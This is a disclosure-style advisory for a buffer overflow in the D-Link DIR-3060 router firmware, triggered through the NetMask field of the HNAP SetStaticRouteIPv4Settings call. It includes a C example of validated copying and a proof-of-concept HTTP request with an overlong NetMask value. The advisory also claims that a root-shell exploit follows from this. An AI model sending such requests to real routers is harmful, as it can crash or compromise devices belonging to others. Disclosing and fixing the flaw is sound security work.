D-Link DIR3060A1_FW111B04.bin Overflow vulnerability

Overview

The prog.cgi handler on the DIR-3060 for the HNAP API keyword SetStaticRouteIPv4Settings contains an overflow vulnerability.

Vulnerability details

The variable iVar3 receives the value of the NetMask parameter.

The function FUN_0049ac18() is called with iVar3 as an argument.

This function copies the value of iVar3 directly into local_5c without checking its length, so an overlong NetMask value overflows the buffer.
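As an added defensive example (not the firmware's code and not part of the original advisory), the following C shows how the copy into local_5c could be bounded and validated: the NetMask string is rejected unless it is NUL-terminated within the buffer and parses as a contiguous IPv4 netmask. NETMASK_BUF, store_netmask and accepts_netmask are assumed names.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <arpa/inet.h>

/* Hypothetical fixed buffer standing in for local_5c: "255.255.255.255" + NUL. */
#define NETMASK_BUF 16

/* 1 when s is a dotted quad whose bits are a contiguous run of ones
 * followed by zeros (a real IPv4 netmask), 0 otherwise. */
static int is_valid_netmask(const char *s)
{
    struct in_addr a;
    if (inet_pton(AF_INET, s, &a) != 1)
        return 0;
    uint32_t inv = ~ntohl(a.s_addr);   /* trailing zeros become ones */
    return (inv & (inv + 1)) == 0;     /* inv must equal 2^k - 1 */
}

/* Bounded replacement for the unchecked copy: NetMask is stored in dst
 * only if it is NUL-terminated within NETMASK_BUF bytes and parses as a
 * netmask. Returns 0 on success, -1 on rejection (dst left empty). */
int store_netmask(const char *netmask, char dst[NETMASK_BUF])
{
    dst[0] = '\0';
    /* memchr never reads beyond NETMASK_BUF, so an overlong value such
     * as the PoC's run of 'a' is rejected before anything is copied. */
    if (netmask == NULL || memchr(netmask, '\0', NETMASK_BUF) == NULL)
        return -1;
    if (!is_valid_netmask(netmask))
        return -1;
    memcpy(dst, netmask, strlen(netmask) + 1);
    return 0;
}

/* Result of storing s into a fresh buffer: 0 accepted, -1 rejected. */
int accepts_netmask(const char *s)
{
    char buf[NETMASK_BUF];
    return store_netmask(s, buf);
}

int main(void)
{
    /* Constructed inputs: a valid mask and an overlong PoC-style value. */
    printf("%d\n", accepts_netmask("255.255.255.0"));
    printf("%d\n", accepts_netmask("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"));
    return 0;
}
```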

POC

  1. Send the following POC request to the device:
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:7018
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/xml
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetNetworkSettings"
HNAP_AUTH: 3C5A4B9EECED160285AAE8D34D8CBA43 1649125990491
Content-Length: 632
Origin: http://192.168.0.1:7018
Connection: close
Referer: http://192.168.0.1:7018/Network.html
Cookie: SESSION_ID=2:1556825615:2; uid=TFKV4ftJ

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetStaticRouteIPv4Settings>
			<StaticRouteIPv4Data>
				<SRIPv4Info>
				<Enabled>true</Enabled>
				<Name></Name>
				<IPAddress>192.168.0.1</IPAddress>
				<NetMask>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</NetMask>
				<Gateway>192.168.0.254</Gateway>
				<Metric></Metric>
				<Interface></Interface>
				</SRIPv4Info>
			</StaticRouteIPv4Data>
		</SetStaticRouteIPv4Settings>
	</soap:Body>
</soap:Envelope>

Finally, an exploit can be written on this basis that reliably obtains a root shell.